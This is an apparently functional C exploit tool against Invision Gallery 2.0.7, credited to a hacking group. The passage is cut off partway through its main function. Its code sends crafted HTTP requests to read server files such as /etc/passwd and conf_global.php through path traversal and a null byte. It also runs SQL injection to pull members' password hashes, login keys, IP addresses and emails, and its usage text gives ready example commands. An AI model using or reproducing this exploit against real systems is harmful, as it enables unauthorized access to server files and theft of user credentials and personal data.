DWORD resolve(char *host) { DWORD ret = 0; struct hostent * hp = gethostbyname(host); if (!hp) ret = inet_addr(host); if ((!hp)&&(ret == INADDR_NONE)) return 0; if (hp != NULL) memcpy((void*)&ret, hp->h_addr,hp->h_length); return ret; } int Exploit(char * sendbuffer, char * mode, char * host) { char recvbuffer[10024]; char * temp; memset(recvbuffer,0,10024); SOCKET s = socket(AF_INET,SOCK_STREAM,0); SOCKADDR_IN webaddr; webaddr.sin_addr.S_un.S_addr = resolve(host); webaddr.sin_family = AF_INET; webaddr.sin_port = htons(80); if(connect(s, (struct sockaddr *)&webaddr,sizeof(SOCKADDR_IN))) return -1; send(s, sendbuffer, strlen(sendbuffer),0); int i, j; while(i = recv(s,recvbuffer+strlen(recvbuffer),1,0)) for(int i = 0; recvbuffer[i]!=0; ++i) { if((recvbuffer[i]=='\r')&&(recvbuffer[i+1]=='\n')&& (recvbuffer[i+2]=='\r')&&(recvbuffer[i+3]=='\n')) {temp = (char*)&recvbuffer[i] + 4;break;} } if(strcmp(mode,"readfile")==0) { printf("\n [+] Exploit Result:\n\n%s", temp); return 0; } if(strcmp(mode,"sqlinject")==0) { char * token = NULL; char * injected = NULL; char * parse = NULL; token = strtok(temp, "="); token = strtok(NULL, "="); token = strtok(NULL, "&"); token = strtok(NULL, "&"); for(int j = 0; j < 2; j++) { token = strtok(NULL, "&"); if(j==1){ injected = token; printf("\n [+] Exploit Result:\n\n%s", injected); } } } else { printf("\n[-] some error. change MODE param\n"); return 0; } return 0; } int main(int argc,char * argv[]) { WSADATA wsaData; WSAStartup(MAKEWORD(2,2),&wsaData); printf("\n \n"); printf(" Invision Gallery 2.0.7 ReadFile() & SQL injection exploit \n"); printf(" (c)oded by _1nf3ct0r_ // Hell Knights Crew \n"); printf(" http://hellknights.void.ru/ \n"); printf(" Gr33tz: blackybr, 1dt.w0lf, ShadOS, ZaCo, SkvoznoY, HATS-Team \n"); printf(" \n"); if (argc == 1) { printf("\n\n [+] ReadFile():\n"); printf(" - syntax:\n"); printf(" readfile 1 <host> <pathtoindex> <localfile> \n"); printf(" readfile 2 <host> <pathtoindex> <localfile> try it 1f readfile[1] failed \n"); printf(" - params: \n"); printf(" <localfile> - path to local file ( /file), f0r example: / / / / /etc/passwd\n"); printf(" s0, 1f u want to get local path to IPB 7ry th1s: / /hellknightscrewxploit \n"); printf(" - examples:\n"); printf(" readfile 1 asd.ru index.php / / / / / /etc/passwd\n"); printf(" readfile 1 asd.ru forum/index.php / /conf_global.php\n"); printf(" readfile 1 asd.ru forum/index.php / /conf_global.php%00\n\n\n"); printf(" [+] SQL-injection:\n"); printf(" - syntax\n"); printf(" sqlinject <host> <pathtoindex> <member_id> <prefix> <column> <table>\n"); printf(" getprefix <host> <pathtoindex> get database prefix from IPB error \n"); printf(" - params:\n"); printf(" <member_id> - member's id for SQL-injection result, for example: 1\n"); printf(" <column> - ipb members' column to get. for example: ip_adress, email.\n"); printf(" <table> - ipb table to use. f0r example: member\n"); printf(" <prefix> - database prefix. \n"); printf(" - examples:\n"); printf(" ig.exe sqlinject asd.ru index.php legacy_password ibf_ members 1 \n"); printf(" ig.exe sqlinject asd.ru index.php member_login_key ibf_ members 1\n"); printf(" ig.exe sqlinject asd.ru forum/index.php ip_adress ibf_ member 5\n\n"); return 1; } char * mode = argv[1]; // readfile() exploit // if (strcmp(mode,"readfile")==0) { char * type = argv[2]; char * path = NULL; path = argv[4];